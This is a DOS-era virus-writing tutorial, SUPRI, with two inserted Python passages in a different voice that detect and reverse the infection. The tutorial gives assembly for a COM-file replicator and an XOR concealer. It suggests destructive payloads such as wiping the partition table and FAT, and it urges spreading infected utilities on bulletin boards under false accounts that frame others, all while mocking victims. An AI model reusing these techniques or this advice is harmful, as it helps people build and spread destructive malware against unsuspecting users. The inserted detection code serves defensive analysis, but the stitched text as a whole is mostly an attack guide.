SUPRI (SUPREME V1)
Assembly Language Virus
VIRUS ARE WONDROUS CREATIONS WRITTEN FOR THE SOLE
PURPOSE OF SPREADING AND DESTROYING THE SYSTEMS OF
UNSUSPECTING FOOLS. THIS ELIMINATES THE SYSTEMS OF
SIMPLETONS WHO CAN'T TELL THAT THERE IS A PROBLEM
WHEN A 100 BYTE FILE SUDDENLY BLOSSOMS INTO A 1,000
BYTE FILE. DUH. THESE LOW-LIFES DO NOT DESERVE TO EXIST,
SO IT IS OUR SACRED DUTY TO WIPE THEIR HARD DRIVES OFF
THE FACE OF THE EARTH. IT IS A SIMPLE MATTER OF SPEEDING
ALONG SURVIVAL OF THE FITTEST
THERE ARE THREE TYPES OF VIRUS:
1) TINY VIRUS (UNDER 500 BYTES) WHICH ARE DESIGNED TO BE
UNDETECTABLE DUE TO THEIR SMALL SIZE. TINY IS ONE SUCH VIRUS. THEY
ARE GENERALLY VERY SIMPLE BECAUSE THEIR CODE LENGTH IS SO LIMITED.
2) LARGE VIRUS (OVER 1,500 BYTES) WHICH ARE DESIGNED TO BE
UNDETECTABLE BECAUSE THEY COVER THEIR TRACKS VERY WELL (ALL THAT
CODE DOES HAVE A USE!). THE BEST EXAMPLE OF THIS IS THE WHALE VIRUS,
WHICH IS PERHAPS THE BEST 'STEALTH' VIRUS IN EXISTENCE.
3) OTHER VIRUS WHICH ARE NOT DESIGNED TO BE HIDDEN AT ALL (THE
WRITERS DON'T GIVE A SHIT). THE COMMON VIRUS IS LIKE THIS. ALL
OVERWRITING VIRUS ARE IN THIS CATEGORY.
PARTS OF A VIRUS
A VIRUS MAY BE DIVIDED INTO THREE PARTS: THE REPLICATOR,
THE CONCEALER, AND THE BOMB. THE REPLICATOR PART
CONTROLS THE SPREAD OF THE VIRUS TO OTHER FILES, THE
CONCEALER KEEPS THE VIRUS FROM BEING DETECTED, AND
THE BOMB ONLY EXECUTES WHEN THE ACTIVATION CONDITIONS
OF THE VIRUS (MORE ON THAT LATER) ARE SATISFIED.
THE REPLICATOR
THE JOB OF THE REPLICATOR IS TO SPREAD THE VIRUS THROUGHOUT THE
SYSTEM OF THE CLOD WHO HAS CAUGHT THE VIRUS. HOW DOES IT DO THIS
WITHOUT DESTROYING THE FILE IT INFECTS? THE EASIEST TYPE OF
REPLICATOR INFECTS COM FILES. IT FIRST SAVES THE FIRST FEW BYTES OF
THE INFECTED FILE. IT THEN COPIES A SMALL PORTION OF ITS CODE TO THE
BEGINNING OF THE FILE, AND THE REST TO THE END.
THE UNINFECTED FILE:
| P1 | P2 |
THE VIRUS CODE:
| V1 | V2 |
IN THE DIAGRAM, P1 IS PART 1 OF THE FILE, P2 IS PART 2 OF THE FILE, AND
V1 AND V2 ARE PARTS 1 AND 2 OF THE VIRUS. NOTE THAT THE SIZE OF P1
SHOULD BE THE SAME AS THE SIZE OF V1, BUT THE SIZE OF P2 DOESN'T
NECESSARILY HAVE TO BE THE SAME SIZE AS V2. THE VIRUS FIRST SAVES P1
AND COPIES IT EITHER 1) TO THE END OF THE FILE OR 2) INSIDE THE
CODE OF THE VIRUS. LET'S ASSUME IT COPIES P1 TO THE END OF THE
FILE. THE FILE NOW LOOKS LIKE:
| P1 | P2 | P1 |
THEN, THE VIRUS COPIES THE FIRST PART OF ITSELF TO THE
BEGINNING OF THE FILE:
| V1 | P2 | P1 |
FINALLY, THE VIRUS COPIES THE SECOND PART OF ITSELF TO
THE END OF THE FILE. THE FINAL, INFECTED FILE LOOKS LIKE
THIS:
| V1 | P2 | P1 | V2 |
THE QUESTION IS: WHAT DO V1 AND V2 DO? V1
TRANSFERS CONTROL OF THE PROGRAM TO V2. THE CODE TO
DO THIS IS SIMPLE.
JMP FAR PTR DUH ; TAKES FOUR BYTES
DUH DW V2_START ; TAKES TWO BYTES
DUH IS A FAR POINTER (SEGMENT:OFFSET) POINTING TO THE FIRST
INSTRUCTION OF V2. NOTE THAT THE VALUE OF DUH MUST BE CHANGED TO
REFLECT THE LENGTH OF THE FILE THAT IS INFECTED. FOR EXAMPLE, IF THE
ORIGINAL SIZE OF THE PROGRAM IS 79 BYTES, DUH MUST BE CHANGED SO
THAT THE INSTRUCTION AT CS:[155H] IS EXECUTED. THE VALUE OF DUH IS
OBTAINED BY ADDING THE LENGTH OF V1, THE ORIGINAL SIZE OF THE
INFECTED FILE, AND 256 (TO ACCOUNT FOR THE PSP). IN THIS CASE, V1 = 6
AND P1 + P2 = 79, SO 6 + 79 + 256 = 341 DECIMAL (155 HEX).
V2 CONTAINS THE REST OF THE CODE, I.E. THE STUFF THAT DOES
EVERYTHING ELSE. THE LAST PART OF V2 COPIES P1 OVER V1 (IN
MEMORY, NOT ON DISK) AND THEN TRANSFERS CONTROL TO THE
BEGINNING OF THE FILE (IN MEMORY). THE ORIGINAL PROGRAM WILL
THEN RUN HAPPILY AS IF NOTHING HAPPENED. THE CODE TO DO THIS
IS ALSO VERY SIMPLE.
MOV SI, V2_START ; V2_START IS A LABEL MARKING WHERE V2 STARTS
SUB SI, V1_LENGTH ; GO BACK TO WHERE P1 IS STORED
MOV DI, 0100H ; ALL COM FILES ARE LOADED @ CS:[100H] IN MEMORY
MOV CX, V1_LENGTH ; MOVE CX BYTES
REP MOVSB ; DS:[SI] -> ES:[DI]
MOV DI, 0100H
JMP DI
THIS CODE ASSUMES THAT P1 IS LOCATED JUST BEFORE V2, AS IN:
P1_STORED_HERE:
.
.
.
V2_START:
IT ALSO ASSUMES ES EQUALS CS. IF THESE ASSUMPTIONS ARE FALSE,
CHANGE THE CODE ACCORDINGLY. HERE IS AN EXAMPLE:
PUSH CS ; STORE CS
POP ES ; AND MOVE IT TO ES
; NOTE MOV ES, CS IS NOT A VALID INSTRUCTION
MOV SI, P1_START ; MOVE FROM WHERE EVER P1 IS STORED
MOV DI, 0100H ; TO CS:[100H]
MOV CX, V1_LENGTH
REP MOVSB
MOV DI, 0100H
JMP DI
V1_START:
JMP FAR PTR DUH
DUH DW V2_START
V1_END:
P2_START:
P2_END:
P1_START:
; FIRST PART OF THE PROGRAM STORED HERE FOR FUTURE USE
P1_END:
V2_START:
; REAL STUFF
V2_END:
V1_LENGTH EQU V1_END - V1_START
THAT'S ALL THERE IS TO INFECTING A COM FILE WITHOUT DESTROYING IT!
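Seen from the analyst's side, the layout just described leaves a fixed footprint: the file opens with a far jump through a pointer stored right behind it, the pointer value is V1 length + original size + 256, and the displaced first bytes (P1) sit immediately before V2. The following Python is an added example, not code from the slides: it recognises that footprint on a constructed byte string, carries the slides' 6 + 79 + 256 = 341 (155h) arithmetic in both directions, and rebuilds the original file by moving P1 back to the front. The function names, the sample bytes and the `V2` placeholder are mine; the constants (COM load address 100h, the 6-byte V1) come from the slides.

```python
from typing import Optional

# Constants taken from the slides: a COM image is loaded at CS:0100h (the 256-byte
# PSP sits below it) and V1 is six bytes: JMP FAR PTR DUH (4) + DUH DW (2).
PSP_SIZE = 0x100
V1_LENGTH = 6
# Opcode bytes of "JMP FAR PTR [mem16]" in 16-bit code (FF /5 with a direct address).
JMP_FAR_INDIRECT = b"\xff\x2e"


def v2_entry_offset(original_size: int) -> int:
    """The slides' arithmetic: V1 length + original file size + 256 for the PSP."""
    return V1_LENGTH + original_size + PSP_SIZE


def original_size_from_entry(entry: int) -> int:
    """The same sum solved for the original size; a cleaner only sees the pointer."""
    return entry - PSP_SIZE - V1_LENGTH


def inspect_com(image: bytes) -> Optional[dict]:
    """Return the recovered layout if `image` carries the | V1 | P2 | P1 | V2 | footprint.

    Checks: the file starts with a far jump through a pointer stored right after it,
    and that pointer lands inside the file, far enough in to leave room for P1 and P2.
    """
    if len(image) < V1_LENGTH or image[:2] != JMP_FAR_INDIRECT:
        return None
    pointer_addr = int.from_bytes(image[2:4], "little")   # memory address of DUH
    if pointer_addr - PSP_SIZE != 4:                       # DUH follows the 4-byte jump
        return None
    entry = int.from_bytes(image[4:6], "little")           # the DW holding V2_START
    original_size = original_size_from_entry(entry)
    v2_offset = entry - PSP_SIZE                           # file offset of V2
    if original_size < V1_LENGTH or v2_offset >= len(image):
        return None
    return {
        "original_size": original_size,
        "p1_offset": v2_offset - V1_LENGTH,    # P1 is stored just before V2
        "v2_offset": v2_offset,
        "v2_length": len(image) - v2_offset,
    }


def restore_com(image: bytes) -> Optional[bytes]:
    """Undo the layout: put P1 back in front of P2 and drop V1 and V2."""
    info = inspect_com(image)
    if info is None:
        return None
    p1 = image[info["p1_offset"]:info["p1_offset"] + V1_LENGTH]
    p2 = image[V1_LENGTH:info["original_size"]]
    return p1 + p2


# Constructed sample matching the slides' worked numbers: a 79-byte "program"
# (arbitrary bytes, not code), so V2 must start at 6 + 79 + 256 = 341 = 155h.
ORIGINAL = bytes(range(79))
V1 = JMP_FAR_INDIRECT + (0x104).to_bytes(2, "little") + (0x155).to_bytes(2, "little")
V2_PLACEHOLDER = b"V2" * 10            # stands in for the virus body; not code
INFECTED_SAMPLE = V1 + ORIGINAL[V1_LENGTH:] + ORIGINAL[:V1_LENGTH] + V2_PLACEHOLDER

if __name__ == "__main__":
    print(inspect_com(INFECTED_SAMPLE))
    print(restore_com(INFECTED_SAMPLE) == ORIGINAL)
```

The range check on the pointer is what turns the slides' formula into a usable heuristic: an entry that points past the end of the file, or implies an original shorter than V1, cannot be this layout, so a clean file that happens to begin with FF 2E is not flagged.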
CONCEALER
THIS IS THE PART WHICH CONCEALS THE PROGRAM FROM NOTICE BY THE
EVERYDAY USER AND VIRUS SCANNER. THE SIMPLEST FORM OF
CONCEALMENT IS THE ENCRYPTOR. THE CODE FOR A SIMPLE XOR
ENCRYPTION SYSTEM FOLLOWS:
ENCRYPT_VAL DB ?
DECRYPT:
ENCRYPT:
MOV AH, ENCRYPT_VAL
MOV CX, PART_TO_ENCRYPT_END - PART_TO_ENCRYPT_START
MOV SI, PART_TO_ENCRYPT_START
MOV DI, SI
XOR_LOOP:
LODSB ; DS:[SI] -> AL
XOR AL, AH
STOSB ; AL -> ES:[DI]
LOOP XOR_LOOP
RET
NOTE THE ENCRYPTION AND DECRYPTION PROCEDURES ARE THE SAME. THIS
IS DUE TO THE NATURE OF XOR: APPLYING THE SAME KEY TWICE GIVES BACK
THE ORIGINAL. YOU CAN CALL THESE PROCEDURES FROM ANYWHERE IN THE
PROGRAM, BUT MAKE SURE YOU DO NOT CALL THEM FROM A PLACE WITHIN
THE AREA TO BE ENCRYPTED, AS THE PROGRAM WILL CRASH. WHEN WRITING
THE VIRUS, SET THE ENCRYPTION VALUE TO 0.
PART_TO_ENCRYPT_START AND PART_TO_ENCRYPT_END SANDWICH THE
AREA YOU WISH TO ENCRYPT. USE A CALL DECRYPT AT THE BEGINNING OF V2
TO DECRYPT THE FILE SO YOUR PROGRAM CAN RUN. WHEN INFECTING A
FILE, FIRST CHANGE THE ENCRYPT_VAL, THEN CALL ENCRYPT, THEN WRITE
V2 TO THE END OF THE FILE, AND CALL DECRYPT. MAKE SURE THIS PART
DOES NOT LIE IN THE AREA TO BE ENCRYPTED!!!
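The weakness of this concealer is the flip side of the rule just given: the decryptor must stay in cleartext, so its few bytes are a constant fingerprint whatever key was chosen, and a one-byte key leaves only 256 possibilities to try. The Python below is an added example, not code from the slides: it models the XOR loop on a byte string, finds the cleartext stub, brute-forces the key by looking for a known fragment, and unmasks the body. The two stub byte sequences are my assumption of what an assembler typically emits for LODSB / XOR AL,AH / STOSB / LOOP; the body, key and fragment are constructed for the demonstration.

```python
from typing import Optional, Tuple

# Two common encodings of the slides' XOR_LOOP body (LODSB / XOR AL,AH / STOSB /
# LOOP back 5 bytes). The loop has to stay in cleartext to run, so these bytes are
# a fixed fingerprint no matter what ENCRYPT_VAL was used (assumed encodings).
DECRYPTOR_STUBS = (
    b"\xac\x32\xc4\xaa\xe2\xfb",
    b"\xac\x30\xe0\xaa\xe2\xfb",
)


def xor_bytes(data: bytes, key: int) -> bytes:
    """The XOR_LOOP on a byte string: one call encrypts, the same call decrypts."""
    return bytes(b ^ key for b in data)


def find_decryptor_stub(image: bytes) -> Optional[int]:
    """Offset of the cleartext decryptor loop, if one of its encodings is present."""
    for stub in DECRYPTOR_STUBS:
        pos = image.find(stub)
        if pos != -1:
            return pos
    return None


def recover_key(ciphertext: bytes, known_fragment: bytes) -> Optional[int]:
    """Brute-force the one-byte key: 256 trials, keep the one that reveals a known fragment."""
    for key in range(256):
        if known_fragment in xor_bytes(ciphertext, key):
            return key
    return None


def unmask(image: bytes, known_fragment: bytes) -> Optional[Tuple[int, bytes]]:
    """Locate the stub, recover the key for the bytes after it, return (key, decrypted tail)."""
    pos = find_decryptor_stub(image)
    if pos is None:
        return None
    tail = image[pos + len(DECRYPTOR_STUBS[0]):]
    key = recover_key(tail, known_fragment)
    if key is None:
        return None
    return key, xor_bytes(tail, key)


# Constructed sample: three NOPs, the cleartext stub, its RET, then a body that was
# XORed with a constructed key. The body is plain text standing in for code.
BODY = b"CONSTRUCTED SAMPLE BODY: ACTIVATION CHECK AND FILE WRITE GO HERE"
KEY = 0x5A
SAMPLE_IMAGE = b"\x90\x90\x90" + DECRYPTOR_STUBS[0] + b"\xc3" + xor_bytes(BODY, KEY)

if __name__ == "__main__":
    print(find_decryptor_stub(SAMPLE_IMAGE))
    print(unmask(SAMPLE_IMAGE, b"SAMPLE BODY"))
```

A scanner does not even need the brute force: matching the stub alone is enough to flag the file, and the key search only matters when an analyst wants to read what the body does.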
THE BOMB
SO NOW ALL THE BORING STUFF IS OVER. THE NASTINESS IS CONTAINED
HERE. THE BOMB PART OF THE VIRUS DOES ALL THE
DELETION/SLOWDOWN/ETC WHICH MAKE VIRII SO ANNOYING. SET SOME
ACTIVATION CONDITIONS OF THE VIRUS. THIS CAN BE ANYTHING, RANGING
FROM WHEN IT'S YOUR BIRTHDAY TO WHEN THE VIRUS HAS INFECTED 100
FILES. WHEN THESE CONDITIONS ARE MET, THEN YOUR VIRUS DOES THE
GOOD STUFF. SOME SUGGESTIONS OF POSSIBLE BOMBS: 1) SYSTEM
SLOWDOWN - EASILY HANDLED BY TRAPPING AN INTERRUPT AND CAUSING A
DELAY WHEN IT ACTIVATES. 2) FILE DELETION - DELETE ALL ZIP FILES ON THE
DRIVE. 3) MESSAGE DISPLAY - DISPLAY A NICE MESSAGE SAYING SOMETHING
TO THE EFFECT OF "YOU ARE FUCKED." 4) KILLING/REPLACING THE
PARTITION TABLE/BOOT SECTOR/FAT OF THE HARD DRIVE - THIS IS VERY
NASTY, AS MOST DIMWITS CANNOT FIX THIS.
OFFSET PROBLEMS
THERE IS ONE CAVEAT REGARDING CALCULATION OF OFFSETS. AFTER YOU
INFECT A FILE, THE LOCATIONS OF VARIABLES CHANGE. YOU MUST ACCOUNT
FOR THIS. ALL RELATIVE OFFSETS CAN STAY THE SAME, BUT YOU MUST ADD
THE FILE SIZE TO THE ABSOLUTE OFFSETS OR YOUR PROGRAM WILL NOT
WORK. THIS IS THE MOST TRICKY PART OF WRITING VIRUS AND TAKING
THESE INTO ACCOUNT CAN OFTEN GREATLY INCREASE THE SIZE OF A VIRUS.
THIS IS VERY IMPORTANT AND YOU SHOULD BE SURE TO UNDERSTAND THIS
BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
TESTING
TESTING VIRII IS A DANGEROUS YET ESSENTIAL PART OF THE VIRUS
CREATION PROCESS. THIS IS TO MAKE CERTAIN THAT PEOPLE *WILL* BE HIT
BY THE VIRUS AND, HOPEFULLY, WIPED OUT. TEST THOROUGHLY AND MAKE
SURE IT ACTIVATES UNDER THE CONDITIONS. IT WOULD BE GREAT IF
EVERYONE HAD A SECOND COMPUTER TO TEST THEIR VIRII OUT, BUT, OF
COURSE, THIS IS NOT THE CASE. SO IT IS ESSENTIAL THAT YOU KEEP
BACKUPS OF YOUR FILES, PARTITION, BOOT RECORD, AND FAT. NORTON IS
HANDY FOR DOING THIS. DO NOT DISREGARD THIS ADVICE (EVEN THOUGH
I KNOW THAT YOU WILL ANYWAY) BECAUSE YOU WILL BE HIT BY YOUR OWN
VIRII. WHEN I WROTE MY FIRST VIRUS, MY SYSTEM WAS TAKEN DOWN FOR
TWO DAYS BECAUSE I DIDN'T HAVE GOOD BACKUPS. LUCKILY, THE VIRUS
WAS NOT OVERLY DESTRUCTIVE. BACKUPS MAKE SENSE! LEECH A BACKUP
PROGRAM FROM YOUR LOCAL PIRATE BOARD! I FIND A RAMDRIVE IS OFTEN
HELPFUL IN TESTING VIRII, AS THE DAMAGE IS NOT PERMANENT. RAMDRIVES
ARE ALSO USEFUL FOR TESTING TROJANS, BUT THAT IS THE TOPIC OF
ANOTHER FILE...
DISTRIBUTION
THIS IS ANOTHER FUN PART OF VIRUS WRITING. IT INVOLVES SENDING YOUR
BRILLIANTLY-WRITTEN PROGRAM THROUGH THE PHONE LINES TO YOUR
LOCAL, UNSUSPECTING BULLETIN BOARDS. WHAT YOU SHOULD DO IS INFECT
A FILE THAT ACTUALLY DOES SOMETHING (LEECH A USEFUL UTILITY FROM
ANOTHER BOARD), INFECT IT, AND UPLOAD IT TO A PLACE WHERE IT WILL BE
DOWNLOADED BY USERS ALL OVER. THE BEST THING IS THAT IT WON'T BE
DETECTED BY PUNY SCANNER-WANNA-BES BY MCAFEE, SINCE IT IS NEW!
OH YEAH, MAKE SURE YOU ARE USING A FALSE ACCOUNT (DUH). BETTER YET,
MAKE A FALSE ACCOUNT WITH THE NAME/PHONE NUMBER OF SOMEONE
YOU DON'T LIKE AND UPLOAD THE INFECTED FILE UNDER HIS NAME. YOU
CAN CALL BACK FROM TIME TO TIME AND USE A DOOR SUCH AS ZDOOR TO
CHECK THE SPREAD OF THE VIRUS. THE MORE WHO DOWNLOAD, THE MORE
WHO SHARE IN THE EXPERIENCE OF YOUR VIRUS!
THAT’S ALL
THANK YOU TO ALL